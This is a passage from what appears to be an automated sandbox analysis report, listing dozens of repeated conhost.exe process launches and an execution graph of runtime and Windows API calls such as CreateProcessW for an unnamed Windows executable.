MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:193
Start time:20:26:58
Start date:28/09/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:199
Start time:20:27:00
Start date:28/09/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:201
Start time:20:27:00
Start date:28/09/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:205
Start time:20:27:01
Start date:28/09/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:232
Start time:20:27:07
Start date:28/09/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:244
Start time:20:27:07
Start date:28/09/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:247
Start time:20:27:08
Start date:28/09/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:255
Start time:20:27:09
Start date:28/09/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:259
Start time:20:27:10
Start date:28/09/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:261
Start time:20:27:10
Start date:28/09/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:273
Start time:20:27:12
Start date:28/09/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6ae840000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:277
Start time:20:27:13
Start date:28/09/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:287
Start time:20:27:13
Start date:28/09/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:316
Start time:20:27:16
Start date:28/09/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:322
Start time:20:27:16
Start date:28/09/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:328
Start time:20:27:17
Start date:28/09/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6bac90000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Target ID:330
                                                                                                    Start time:20:27:17
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:
                                                                                                    Has administrator privileges:
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Target ID:334
                                                                                                    Start time:20:27:17
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:
                                                                                                    Has administrator privileges:
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Target ID:336
                                                                                                    Start time:20:27:17
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:
                                                                                                    Has administrator privileges:
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Target ID:352
                                                                                                    Start time:20:27:18
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:
                                                                                                    Has administrator privileges:
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Target ID:376
                                                                                                    Start time:20:27:19
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7403e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:
                                                                                                    Has administrator privileges:
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Target ID:403
                                                                                                    Start time:20:27:20
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:
                                                                                                    Has administrator privileges:
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Target ID:417
                                                                                                    Start time:20:27:20
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:
                                                                                                    Has administrator privileges:
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Target ID:421
                                                                                                    Start time:20:27:20
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:
                                                                                                    Has administrator privileges:
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Target ID:423
                                                                                                    Start time:20:27:20
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:
                                                                                                    Has administrator privileges:
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Target ID:427
                                                                                                    Start time:20:27:20
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:
                                                                                                    Has administrator privileges:
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Target ID:435
                                                                                                    Start time:20:27:21
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:
                                                                                                    Has administrator privileges:
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Target ID:463
                                                                                                    Start time:20:27:22
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:
                                                                                                    Has administrator privileges:
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Target ID:487
                                                                                                    Start time:20:27:22
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:
                                                                                                    Has administrator privileges:
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Target ID:489
                                                                                                    Start time:20:27:22
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:
                                                                                                    Has administrator privileges:
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Target ID:493
                                                                                                    Start time:20:27:22
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:
                                                                                                    Has administrator privileges:
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Target ID:499
                                                                                                    Start time:20:27:22
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:
                                                                                                    Has administrator privileges:
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Target ID:513
                                                                                                    Start time:20:27:23
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:
                                                                                                    File size:862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 519
Start time: 20:27:23
Start date: 28/09/2024
Path: C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 529
Start time: 20:27:23
Start date: 28/09/2024
Path: C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false


Execution Graph

Execution Coverage: 10.2%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 22.5%
Total number of Nodes: 1000
Total number of Limit Nodes: 22
7ff6c786d327 23702->23703 23704 7ff6c786d32e 23703->23704 23705 7ff6c786d344 GetCurrentProcess TerminateProcess ExitProcess GetModuleHandleExW GetProcAddress 23703->23705 23706 7ff6c786d340 23705->23706 23707->23700 23708 7ff6c786d39c GetModuleHandleExW GetProcAddress 23707->23708 23708->23700 23710 7ff6c787ab80 _Getctype 28 API calls 23709->23710 23711 7ff6c78799e1 23710->23711 23714 7ff6c787675c 28 API calls 2 library calls 23711->23714 23948 7ff6c7877e70 6 API calls 23917 7ff6c7867f70 34 API calls 2 library calls 22626 7ff6c787e95c 22627 7ff6c787e9bf 22626->22627 22628 7ff6c787e98e 22626->22628 22627->22628 22635 7ff6c787e9d6 22627->22635 22728 7ff6c7874bc4 22628->22728 22632 7ff6c787ea8e 22633 7ff6c787eae9 22632->22633 22634 7ff6c787eabe 22632->22634 22638 7ff6c787b160 _set_fmode 6 API calls 22633->22638 22667 7ff6c787f474 22634->22667 22635->22632 22635->22635 22732 7ff6c787b160 22635->22732 22641 7ff6c787eb03 22638->22641 22640 7ff6c787eae1 22747 7ff6c7874aa8 11 API calls _invalid_parameter_noinfo_noreturn 22640->22747 22663 7ff6c787eb0b 22641->22663 22745 7ff6c7879a04 28 API calls 2 library calls 22641->22745 22644 7ff6c787ea44 22738 7ff6c787b1d8 22644->22738 22645 7ff6c787ea53 22743 7ff6c7879a04 28 API calls 2 library calls 22645->22743 22649 7ff6c787eb1e 22649->22640 22655 7ff6c7874bc4 _set_fmode 6 API calls 22649->22655 22650 7ff6c787e99e 22651 7ff6c787b1d8 __free_lconv_num 6 API calls 22651->22640 22652 7ff6c787ea65 22652->22640 22744 7ff6c78898d4 28 API calls 2 library calls 22652->22744 22661 7ff6c787eb27 22655->22661 22657 7ff6c787ea7b 22657->22640 22658 7ff6c787b1d8 __free_lconv_num 6 API calls 22657->22658 22658->22632 22660 7ff6c787f474 31 API calls 22660->22661 22661->22640 22661->22660 22662 7ff6c787eb66 22661->22662 22661->22663 22746 7ff6c7879a04 28 API calls 2 library calls 22661->22746 22664 7ff6c7874bc4 _set_fmode 6 API calls 22662->22664 22663->22651 22665 7ff6c787eb6b 22664->22665 22666 7ff6c787ebac 57 API calls 22665->22666 22666->22663 
22668 7ff6c787f49a 22667->22668 22669 7ff6c787f490 22667->22669 22749 7ff6c7876178 22668->22749 22748 7ff6c787f3c8 29 API calls 5 library calls 22669->22748 22673 7ff6c787f4c2 22757 7ff6c7876af4 22673->22757 22676 7ff6c787f52e 22677 7ff6c787eac8 22676->22677 22678 7ff6c787b1d8 __free_lconv_num 6 API calls 22676->22678 22677->22640 22679 7ff6c787ebac 22677->22679 22678->22677 22680 7ff6c787ebf8 22679->22680 22681 7ff6c787ebdf 22679->22681 22680->22681 22683 7ff6c787ec0d 22680->22683 22684 7ff6c787ec03 22680->22684 22682 7ff6c7874bc4 _set_fmode 6 API calls 22681->22682 22685 7ff6c787ebe4 22682->22685 22806 7ff6c7889c38 22683->22806 22686 7ff6c7874ba4 _fread_nolock 6 API calls 22684->22686 22858 7ff6c7874a58 28 API calls _invalid_parameter_noinfo 22685->22858 22686->22681 22690 7ff6c787ec30 22691 7ff6c787b1d8 __free_lconv_num 6 API calls 22690->22691 22694 7ff6c787ec39 22691->22694 22695 7ff6c787b1d8 __free_lconv_num 6 API calls 22694->22695 22727 7ff6c787ebef 22695->22727 22696 7ff6c787b1d8 __free_lconv_num 6 API calls 22696->22690 22698 7ff6c787ec7f _fread_nolock 22837 7ff6c7889d9c 22698->22837 22701 7ff6c787ed52 __vcrt_getptd_noinit 22859 7ff6c7874b38 6 API calls 2 library calls 22701->22859 22702 7ff6c787edff BuildCatchObjectHelperInternal 22703 7ff6c787ed0c WaitForSingleObject GetExitCodeProcess 22703->22701 22708 7ff6c787ed2a 22703->22708 22704 7ff6c787ed84 22706 7ff6c787ed8a 22704->22706 22707 7ff6c787edae 22704->22707 22712 7ff6c787ed98 22706->22712 22713 7ff6c787ed8f CloseHandle 22706->22713 22709 7ff6c787edbc 22707->22709 22710 7ff6c787edb3 CloseHandle 22707->22710 22714 7ff6c787ed3c 22708->22714 22715 7ff6c787ed33 CloseHandle 22708->22715 22718 7ff6c787b1d8 __free_lconv_num 6 API calls 22709->22718 22710->22709 22711 7ff6c787ed5f 22719 7ff6c787ed6d 22711->22719 22720 7ff6c787ed64 CloseHandle 22711->22720 22716 7ff6c787ec6b 22712->22716 22721 7ff6c787ed9d CloseHandle 22712->22721 22713->22712 22714->22716 22717 7ff6c787ed41 CloseHandle 22714->22717 
22715->22714 22716->22696 22717->22716 22722 7ff6c787edc5 22718->22722 22719->22716 22723 7ff6c787ed76 CloseHandle 22719->22723 22720->22719 22721->22716 22724 7ff6c787b1d8 __free_lconv_num 6 API calls 22722->22724 22723->22716 22725 7ff6c787edd2 22724->22725 22726 7ff6c787b1d8 __free_lconv_num 6 API calls 22725->22726 22726->22727 22727->22640 22729 7ff6c787acf8 _set_fmode 6 API calls 22728->22729 22730 7ff6c7874bcd 22729->22730 22731 7ff6c7874a58 28 API calls _invalid_parameter_noinfo 22730->22731 22731->22650 22737 7ff6c787b171 _set_fmode std::_Facet_Register 22732->22737 22733 7ff6c787b1a6 RtlAllocateHeap 22735 7ff6c787b1c0 22733->22735 22733->22737 22734 7ff6c787b1c2 22736 7ff6c7874bc4 _set_fmode 5 API calls 22734->22736 22735->22644 22735->22645 22736->22735 22737->22733 22737->22734 22739 7ff6c787b1dd HeapFree 22738->22739 22742 7ff6c787b20c 22738->22742 22740 7ff6c787b1f8 __vcrt_getptd_noinit __free_lconv_num 22739->22740 22739->22742 22741 7ff6c7874bc4 _set_fmode 5 API calls 22740->22741 22741->22742 22742->22650 22743->22652 22744->22657 22745->22649 22746->22661 22748->22677 22750 7ff6c787619c 22749->22750 22756 7ff6c7876197 22749->22756 22750->22756 22779 7ff6c787ab80 22750->22779 22754 7ff6c78761da 22801 7ff6c787d034 28 API calls TranslateName 22754->22801 22756->22673 22758 7ff6c7876b42 22757->22758 22759 7ff6c7876b1e 22757->22759 22760 7ff6c7876b9c 22758->22760 22761 7ff6c7876b47 22758->22761 22763 7ff6c787b1d8 __free_lconv_num 6 API calls 22759->22763 22764 7ff6c7876b2d 22759->22764 22805 7ff6c7882d98 MultiByteToWideChar 22760->22805 22761->22764 22766 7ff6c787b1d8 __free_lconv_num 6 API calls 22761->22766 22770 7ff6c7876b5c 22761->22770 22763->22764 22764->22676 22778 7ff6c787f3c8 29 API calls 5 library calls 22764->22778 22766->22770 22804 7ff6c787cf68 7 API calls 2 library calls 22770->22804 22778->22676 22780 7ff6c787ab95 __vcrt_getptd_noinit 22779->22780 22781 7ff6c787aba4 FlsGetValue 22780->22781 22782 7ff6c787abc1 FlsSetValue 22780->22782 
22783 7ff6c787abbb 22781->22783 22789 7ff6c787abb1 __vcrt_getptd_noinit 22781->22789 22784 7ff6c787abd3 22782->22784 22782->22789 22783->22782 22785 7ff6c787b160 _set_fmode 6 API calls 22784->22785 22786 7ff6c787abe2 22785->22786 22787 7ff6c787ac00 FlsSetValue 22786->22787 22788 7ff6c787abf0 FlsSetValue 22786->22788 22792 7ff6c787ac0c FlsSetValue 22787->22792 22793 7ff6c787ac1e 22787->22793 22791 7ff6c787abf9 22788->22791 22790 7ff6c78761b7 22789->22790 22803 7ff6c787675c 28 API calls 2 library calls 22789->22803 22800 7ff6c787cfc8 28 API calls _Getctype 22790->22800 22795 7ff6c787b1d8 __free_lconv_num 6 API calls 22791->22795 22792->22791 22802 7ff6c787a928 6 API calls _set_fmode 22793->22802 22795->22789 22798 7ff6c787ac26 22799 7ff6c787b1d8 __free_lconv_num 6 API calls 22798->22799 22799->22789 22800->22754 22801->22756 22802->22798 22804->22764 22807 7ff6c7889c6f 22806->22807 22808 7ff6c787b160 _set_fmode 6 API calls 22807->22808 22809 7ff6c7889ca5 22808->22809 22810 7ff6c7889cad 22809->22810 22815 7ff6c7889cc3 22809->22815 22860 7ff6c7874b38 6 API calls 2 library calls 22810->22860 22811 7ff6c7889cba 22816 7ff6c787b1d8 __free_lconv_num 6 API calls 22811->22816 22814 7ff6c7889cb5 22817 7ff6c7874bc4 _set_fmode 6 API calls 22814->22817 22815->22811 22818 7ff6c7889d89 22815->22818 22861 7ff6c7879a04 28 API calls 2 library calls 22815->22861 22819 7ff6c7889d24 22816->22819 22817->22811 22863 7ff6c7874aa8 11 API calls _invalid_parameter_noinfo_noreturn 22818->22863 22821 7ff6c7889d49 22819->22821 22862 7ff6c7889940 47 API calls 7 library calls 22819->22862 22822 7ff6c787b1d8 __free_lconv_num 6 API calls 22821->22822 22825 7ff6c787ec28 22822->22825 22825->22690 22831 7ff6c787f004 22825->22831 22826 7ff6c7889d3b 22827 7ff6c7889d3f 22826->22827 22828 7ff6c7889d4b 22826->22828 22829 7ff6c787b1d8 __free_lconv_num 6 API calls 22827->22829 22830 7ff6c787b1d8 __free_lconv_num 6 API calls 22828->22830 22829->22821 22830->22821 22864 7ff6c787e91c 22831->22864 22833 
7ff6c787ec67 22833->22716 22834 7ff6c7874ba4 22833->22834 22879 7ff6c787acf8 22834->22879 22836 7ff6c7874bad 22836->22698 22838 7ff6c7876178 TranslateName 28 API calls 22837->22838 22840 7ff6c7889e26 22838->22840 22839 7ff6c7876af4 8 API calls 22841 7ff6c7889e98 22839->22841 22840->22839 22842 7ff6c788a001 22841->22842 22843 7ff6c7876178 TranslateName 28 API calls 22841->22843 22844 7ff6c788a012 22842->22844 22846 7ff6c787b1d8 __free_lconv_num 6 API calls 22842->22846 22850 7ff6c7889eac 22843->22850 22845 7ff6c788a021 22844->22845 22847 7ff6c787b1d8 __free_lconv_num 6 API calls 22844->22847 22848 7ff6c787ecf1 22845->22848 22849 7ff6c787b1d8 __free_lconv_num 6 API calls 22845->22849 22846->22844 22847->22845 22848->22701 22848->22702 22848->22703 22848->22704 22849->22848 22851 7ff6c7876af4 8 API calls 22850->22851 22852 7ff6c7889f19 22851->22852 22852->22842 22853 7ff6c7889fb5 CreateProcessW 22852->22853 22854 7ff6c7876178 TranslateName 28 API calls 22852->22854 22853->22842 22855 7ff6c7889f3d 22854->22855 22856 7ff6c7876af4 8 API calls 22855->22856 22857 7ff6c7889faa 22856->22857 22857->22842 22857->22853 22858->22727 22859->22711 22860->22814 22861->22815 22862->22826 22865 7ff6c787e938 22864->22865 22868 7ff6c787ee08 22865->22868 22867 7ff6c787e941 22867->22833 22869 7ff6c787ee4f 22868->22869 22870 7ff6c787ee93 22869->22870 22871 7ff6c787ee81 22869->22871 22873 7ff6c787b160 _set_fmode 6 API calls 22870->22873 22872 7ff6c7874bc4 _set_fmode 6 API calls 22871->22872 22874 7ff6c787ee86 22872->22874 22875 7ff6c787eeb4 22873->22875 22874->22867 22876 7ff6c7874bc4 _set_fmode 6 API calls 22875->22876 22878 7ff6c787eec1 _fread_nolock 22875->22878 22876->22878 22877 7ff6c787b1d8 __free_lconv_num 6 API calls 22877->22874 22878->22877 22881 7ff6c787ad0d __vcrt_getptd_noinit 22879->22881 22880 7ff6c787ad39 FlsSetValue 22882 7ff6c787ad4b 22880->22882 22887 7ff6c787ad29 __vcrt_getptd_noinit 22880->22887 22881->22880 22881->22887 22883 7ff6c787b160 _set_fmode 2 API calls 
22882->22883 22884 7ff6c787ad5a 22883->22884 22885 7ff6c787ad78 FlsSetValue 22884->22885 22886 7ff6c787ad68 FlsSetValue 22884->22886 22889 7ff6c787ad96 22885->22889 22890 7ff6c787ad84 FlsSetValue 22885->22890 22888 7ff6c787ad71 22886->22888 22887->22836 22891 7ff6c787b1d8 __free_lconv_num 2 API calls 22888->22891 22895 7ff6c787a928 6 API calls _set_fmode 22889->22895 22890->22888 22891->22887 22893 7ff6c787ad9e 22894 7ff6c787b1d8 __free_lconv_num 2 API calls 22893->22894 22894->22887 22895->22893 23980 7ff6c788f960 RtlDecodePointer _RTC_Initialize 23879 7ff6c787f064 47 API calls 6 library calls 23880 7ff6c786d860 47 API calls __free_lconv_num 23882 7ff6c788d85c RtlUnwindEx __GSHandlerCheck_SEH __GSHandlerCheckCommon 23949 7ff6c7866660 37 API calls 2 library calls 23981 7ff6c788d990 31 API calls 3 library calls 23715 7ff6c7862292 23716 7ff6c78622ae 23715->23716 23717 7ff6c7852660 52 API calls 23716->23717 23718 7ff6c7862358 23717->23718 23719 7ff6c78695e4 Concurrency::cancel_current_task 2 API calls 23718->23719 23720 7ff6c7862369 23719->23720 23721 7ff6c7861ef0 55 API calls 23720->23721 23722 7ff6c786238a 23721->23722 23723 7ff6c78643e0 52 API calls 23722->23723 23724 7ff6c7862395 23723->23724 23725 7ff6c7861c30 52 API calls 23724->23725 23726 7ff6c786239d 23725->23726 23950 7ff6c7875a90 33 API calls 5 library calls 23983 7ff6c7860190 53 API calls 3 library calls 23954 7ff6c78832b4 34 API calls 6 library calls 23889 7ff6c78510b0 71 API calls shared_ptr 23756 7ff6c785e4b0 23757 7ff6c785e4f6 23756->23757 23758 7ff6c785e4c3 _RTC_Initialize 23756->23758 23758->23757 23761 7ff6c786dca4 23758->23761 23762 7ff6c786dcb2 23761->23762 23764 7ff6c786dcb9 23761->23764 23774 7ff6c786dadc 44 API calls 23762->23774 23765 7ff6c785e4e6 23764->23765 23767 7ff6c786da9c 23764->23767 23775 7ff6c786d904 RtlEnterCriticalSection 23767->23775 23769 7ff6c786dab9 23770 7ff6c786dbc8 44 API calls 23769->23770 23771 7ff6c786dac5 23770->23771 23772 7ff6c786d910 